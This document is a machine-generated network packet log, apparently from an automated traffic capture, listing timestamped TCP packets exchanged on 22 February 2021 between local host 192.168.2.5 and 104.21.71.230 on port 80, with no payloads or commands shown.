                                                                                                                                                                Feb 22, 2021 07:45:12.268867970 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.268898964 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.269565105 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.269587994 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.269603014 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.269665003 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.270318985 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.270338058 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.270354986 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.270404100 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.270451069 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.271095037 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.271117926 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.271136045 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.271186113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.271881104 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.271933079 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.271951914 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.271965981 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.272005081 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.292761087 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.292787075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.292804003 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293051958 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293068886 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293085098 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293154001 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.293210030 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.293828011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293847084 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293860912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.293925047 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.294588089 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.294608116 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.294624090 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.294687986 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.294737101 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.295381069 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.295399904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.295417070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.295485973 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.296133995 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.296170950 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.296189070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.296251059 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.296279907 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.296906948 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.296926022 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.296937943 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.296992064 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.297719955 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.297739029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.297758102 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.297796965 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.297846079 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.298445940 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.298465014 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.298487902 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.298535109 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.299247980 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.299268961 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.299282074 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.299348116 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.299462080 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.300038099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.300061941 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.300081015 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.300122023 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.300775051 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.300796986 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.300817013 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.300838947 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.300874949 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.301552057 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.301573038 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.301590919 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.301651001 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.302303076 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.302321911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.302337885 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.302373886 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.302407026 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.303114891 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.303138018 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.303157091 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.303208113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.303867102 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.303891897 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.303934097 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.303936958 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.303983927 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.304636955 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.304656029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.304672003 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.304730892 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.305417061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.305437088 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.305457115 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.305504084 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.305540085 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.306176901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.306204081 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.306221008 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.306273937 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.306957006 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.306976080 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.306992054 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.307029009 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.307059050 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.307725906 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.307744026 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.307760954 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.307811975 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.308506966 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.308526993 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.308542967 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.308600903 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.308640957 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.309281111 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.309302092 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.309315920 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.309401989 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.310044050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.310064077 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.310081005 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.310110092 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.310158014 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.310811996 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.310831070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.310843945 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.310916901 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.559139013 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559166908 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559180975 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559197903 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559215069 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559231043 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559325933 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.559371948 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.559508085 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559526920 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559544086 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559561014 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559576988 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559597969 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.559602976 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.559638023 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.560436010 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.560456038 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.560472012 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.560488939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.560506105 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.560523987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.560525894 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.560560942 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.560590982 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.561327934 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.561351061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.561368942 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.561400890 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.561422110 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.561471939 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.565141916 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565165997 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565186024 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565205097 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565221071 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565237999 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565254927 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.565298080 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.565520048 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565540075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565552950 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.565642118 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.567856073 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.567881107 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.567898035 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.567914963 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.567930937 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.567950964 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.568001032 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.568043947 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.568264008 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.568281889 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.568295956 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.568339109 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.568372011 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.472254038 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.472280979 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.472306013 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.472327948 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.472351074 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.472372055 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473053932 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473073959 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473076105 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.473092079 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473109007 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473128080 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473151922 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.473166943 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.473200083 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.474020958 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474040985 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474059105 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474078894 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474097967 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474524975 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.474869013 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474884987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474900961 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474920034 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474937916 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.474948883 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.474955082 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475003004 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.475131035 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475150108 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475166082 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475182056 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.475183010 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475199938 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475220919 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.475223064 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.475263119 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.475999117 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.476022005 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.476159096 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.476701975 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.476726055 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.476747036 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.476783991 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.476824045 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.784900904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.784940004 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.784960032 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.784981966 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.785006046 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.785021067 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.785264015 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.790492058 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790522099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790540934 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790561914 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790585041 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790611029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790656090 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.790747881 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.790844917 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790868044 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.790931940 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.791074991 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.791099072 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.791115046 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.791129112 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.791146994 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.791177988 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.792623997 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792660952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792684078 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792707920 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792731047 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792747974 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792828083 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.792854071 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.792946100 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792970896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.792992115 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.793013096 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.793014050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.793035030 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.793051004 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:13.793052912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.793098927 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.102091074 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102155924 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102205038 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102248907 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.102288008 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102334023 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.102339983 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102389097 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102438927 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102443933 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.102490902 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102535963 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.102538109 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102590084 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102631092 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.102638960 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102698088 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.102742910 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.103328943 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.103389978 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.103444099 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.103446007 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.103496075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.103538036 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:14.103545904 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:14.103602886 CET8049715104.21.71.230192.168.2.5
